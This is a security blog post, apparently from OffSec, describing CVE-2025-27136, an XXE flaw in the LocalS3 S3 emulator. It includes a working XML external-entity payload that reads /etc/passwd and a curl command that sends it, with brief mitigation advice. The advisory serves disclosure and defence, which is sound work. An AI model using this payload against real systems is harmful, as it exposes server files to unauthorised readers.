Home OffSec
  • Pricing
Enroll now Sign in Search Contact us
Blog

/

CVE-2025-27136 – LocalS3 CreateBucketConfiguration Endpoint XXE Injection

Research & Tutorials

Jul 24, 2025

CVE-2025-27136 – LocalS3 CreateBucketConfiguration Endpoint XXE Injection

Discover how CVE-2025-27136, a critical XXE vulnerability in LocalS3’s CreateBucketConfiguration endpoint, can be exploited to access sensitive files. Learn how the flaw works and how to mitigate it.

OffSec Team OffSec Team

2 min read

Overview

CVE-2025-27136 is an XML External Entity (XXE) injection vulnerability in the CreateBucketConfiguration endpoint of  LocalS3, a local AWS S3 emulator. By sending specially crafted XML payloads, attackers can exploit this flaw to read arbitrary files from the server’s filesystem.

  • CVE ID: CVE-2025-27136
  • Severity: Medium
  • CVSS Score: 5.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
  • EPSS Score: 0.11%
  • Published: April 12, 2025
  • Impact: Information Disclosure
  • Attack Vector: Remote
  • Authentication Required: No
  • Vulnerable Component: CreateBucketConfiguration XML parsing

This vulnerability affects any application using vulnerable versions of LocalS3 that are exposed to XML bucket creation requests.

Technical Breakdown

The CreateBucketConfiguration API endpoint accepts XML input to configure new buckets. LocalS3 uses an insecure XML parser that does not disable external entity resolution.

By crafting a malicious XML payload with a <!DOCTYPE> declaration and referencing external files using the file:// URI scheme, an attacker can retrieve contents of local files readable by the LocalS3 process.

Conditions for Exploitation

  • The LocalS3 instance is running a vulnerable version (prior to the fix).
  • The endpoint / (or the bucket creation route) is reachable by the attacker.
  • XML payloads with external entities are not properly filtered.
  • The attacker knows or guesses sensitive filenames on the server (e.g., /etc/passwd).

     

Vulnerable Code Snippet (Implied)

Though the actual source code isn’t shown in the advisory, the vulnerability is due to an XML parser like Java’s default SAX/DOM parser being invoked without secure processing flags, e.g.:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder(); // XXE-prone without disabling external entity resolution

Exploitation Steps

  1. Craft a malicious XML payload with an external entity:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<CreateBucketConfiguration>
  <LocationConstraint>&xxe;</LocationConstraint>
</CreateBucketConfiguration>

     2. Send the payload to the LocalS3 endpoint:

curl -X PUT http://localhost:8080/bucket-name -H "Content-Type: application/xml" -d @xxe_payload.xml
  1. If vulnerable, the response will contain the contents of /etc/passwd or whatever file was targeted.

Exploitation with Metasploit

Metasploit does not currently have a module for this CVE, but manual exploitation is straightforward via curl or Burp Suite.

Mitigation

  • Update LocalS3 to the latest version where XML parsing is secured.
  • Ensure XML parsers are configured to disable external entity resolution:

References

Stay in the know: Become an OffSec Insider

Stay in the know: Become an OffSec Insider

Get the latest updates about resources, events & promotions from OffSec!

Latest from OffSec

View all blogs